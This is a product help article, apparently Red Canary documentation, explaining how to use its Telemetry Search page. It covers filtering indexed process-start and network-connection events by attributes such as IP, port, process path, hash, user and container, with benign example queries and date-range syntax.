Use Telemetry Search
    • 15 Jul 2024
    • 3 Minutes to read
    • PDF

    Use Telemetry Search

    • PDF

    Article summary

    Telemetry Search is a service that indexes all process starts and network connections for the last seven days of usage. Red Canary now includes a Telemetry Search page and bar where you can search for specific telemetry parameters and view the results in a sortable table. The slide out table displays all the data for that particular process.

    You can conduct a keyword search in Telemetry Search to find information about process launches and network connections. Using a third-party search (OpenSearch specifically), results are indexed and returned fast and accurately. It also allows you to execute partial searches or use wildcards to find a broader set of related telemetry.

    All Telemetry Search results can be exported to a CSV file, giving you the ability to use the data outside of the constraints in the platform.

    This tool enhances our existing Shell Activities feature, which enables you to detect process starts that most likely originated in a shell by making it quick and straightforward to pinpoint individual processes. Including all process starts and networks enables you to easily discover and correlate processes to the data Red Canary already provides. 

    This also gives detection engineers a single page to locate processes and network connections for threat and event analyses.

    Assess Linux EDR telemetry

    To assess your Linux EDR telemetry, you can filter by telemetry attributes.

    1. From the navigation menu, click Telemetry

    2. Enter attributes in the Telemetry Search filter bar, and then press Enter or Return.

    You can search by ‘keyword:value’ on any of the allowed filter attributes. Wildcards are supported, permitting you the ability to search for all processes that match the value up to the wildcard.

    Note: Text searches are always fuzzy matched unless there is a *

    Supported filter attributes

    Event attributes

    Attribute

    Description

    Example

    Event Type

    The type of event that occurred, such as a network connection.

    event_type_cd:network_connection

    event_type_cd:process_start

    Telemetry attributes

    Attribute

    Description

    Example

    Is Shell Activity

    A boolean that indicates if the process is an interactive shell command.

    is_shell_activity:true

    Shell

    The shell where the process was executed.

    shell:bash

    Network attributes

    Attribute

    Description

    Example

    Domain

    The domain of a network connection.

    domain:example.com

    Local ip

    The IP address used in a network connection.

    local_ip:127.0.0.1

    Local port

    The port used in a network connection, such as a local or remote port.

    local_port:43 

    Local IP Type

    The type of network connection that was made.

    local_ip_type_cd:ipv4

    Remote ip

    The remote IP address used in a network connection.

    remote_ip:127.0.0.1

    Remote port

    The remote port used in a network connection. 

    remote_port:8080

    Location

    Indicates if the remote network connection is internal or external.

    remote_location_cd:external

    Remote IP Type

    The type of remote network connection that was made.

    remote_ip_type_cd:ipv6

    Protocol

    The type of protocol used in the network connection.

    protocol_cd:tcp

    Direction

    The direction of the network connection, such as inbound or outbound.

    direction_cd:outbound

    Endpoint attributes

    Attribute

    Description

    Example

    Hostname

    Hostname used by the endpoint.

    host_name:bob_workstation

    Endpoint operating System

    The endpoint’s operating system.

    endpoint_operating_system:ubuntu

    Sensor

    The unique ID of the endpoint’s sensor.

    sensor_id:719d97fc-7ead-4927-b8c9-adffb77f2b79

    Sensor Version

    The endpoint’s sensor version.

    sensor_product_ver:1.4.2-Release-a64b5688fc19b7b163ce409f24ecf763925de396

    To filter endpoints by operating system, use the operating_system: field. You may either type a word after the colon, for example, operating_system:windows; or multiple words surrounded by double quotes, for example, operating_system:"Windows 10". This field is not case-sensitive, and will match on specific endpoint operating systems, as well as canonicalized names.

    Process attributes

    Attribute

    Description

    Example

    Activity At

    The date or date range the process occurred at.

    activity_at:2022-08-01..

    activity_at:2022-08-01..2022-08-05

    Process command Line

    The command line used by the process.

    process_command_line:/usr/bin/cp

     

    Parent process command line

    Command line of a parent process.

    parent_process_command_line:/usr/bin/ls

    Process name

    The name of the process.

    process_name:cp 

    Parent process name

    Name of the parent process.

    parent_process_name:ls

    Process path

    The path of the process.

    process_path:/usr/bin/cp 

    Parent process path

    The path of the parent process.

    parent_process_path:/usr/bin/l

    Process pid

    The process identification number (PID) used by the process.

    process_pid:123456

     

    Parent process pid

    The process identification number (PID) used by the parent process.

    parent_process_pid:123455

    Process md5

    The Message Digest 5 (md5) of the process.

    process_md5:6f0fd9cced2852bc85a2722750ab7d64

     

    Parent process md5

    The Message Digest 5 (md5) of the parent process.

    parent_process_md5:5e446692e912c1933eb0499b91a524bb

    Process sha56

    The sha256 of the process.

    process_sha256:a9d2e611bdff6e1d384abb25229a849762405120f9973be23156d4efca3d979e 

    Parent process sha56

    The sha256 of the parent process.

    parent_process_sha256:abce6efe522d7e7bd8bdf6ecd82eda581a1514f8dea858d700766dc165a79efb

    Working Directory

    The working directory of the process.

    working_directory:/tmp/

    User attributes

    Attribute

    Description

    Example

    User Name

    The username of the user. 

    user_name:bob

    Login user name

    The username of login user.

    login_user_name:bobby

    User uid

    The user identifier (uid) of the user.

    user_uid:1234

    Login user uid

    The user identifier (uid) of the login user.

    login_user_uid:4321

    Container attributes

    Attribute

    Description

    Example

    Container

    The specific docker Container ID holding the endpoint.

    container_id:123456712345

    Container Pod

    The specific docker Container Pod ID holding the endpoint.

    container_pod_id:123456712345

    Date filters are specified with a from..to syntax where either from or to can be unbounded:

    • 2020-01-01.. filters for matches on or after (>=) the from date

    • ..2020-01-01 filters for matches on or before (<=) the to date

    • 2020-01-01..2020-01-31 filters for matches on or after (>=) the from date and on or before (<=) the to date

    Dates can be specified as iso8601 dates or date-times.

    Examples

    Show only results of a particular event type

    To return only network connections you would use the search filter:

    Event_type_cd:network_connection

    To return only process starts you would use the search filter:

    Event_type_cd:process_start

    Show only shell activities

    To return only processes designated as originating in a shell you would use the search filter:

    Is_shell_activity:true

    Wild card search for an IP

    To find an IP address used in a network connection that are part of a particular network you would use the search filter:

    local_ip:127.0.*
    Find all processes running in a container

    container_id:*

     

     

     

     


    Was this article helpful?